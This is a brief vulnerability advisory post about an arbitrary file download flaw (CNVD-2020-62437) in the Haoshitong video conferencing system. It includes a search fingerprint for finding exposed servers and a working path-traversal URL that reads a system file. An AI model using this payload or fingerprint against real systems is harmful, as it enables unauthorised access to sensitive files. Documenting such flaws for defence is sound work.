Yinpeng Cloud Computing Haoshitong Video Conferencing System Any File Download Cnvd 2020 62437
Yinpeng Cloud Computing Haoshitong Video Conferencing System Any File Download Cnvd 2020 62437
Yinpeng Cloud Computing Haoshitong Video Conferencing System Any file download CNVD-2020-62437
Vulnerability Description
Yinpeng Cloud Computing Haoshitong Video Conferencing System There is any file download, and attackers can obtain sensitive information through vulnerabilities
Vulnerability Impact
Yinpeng Cloud Computing Haoshitong Video Conferencing System
Network surveying and mapping
app=”Hanming-Video-Conferencing”
Vulnerability reappears
The login page is as follows
The vulnerability is
https://xxx.xxx.xxx.xxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
##
This post is licensed under CC BY 4.0 by the author.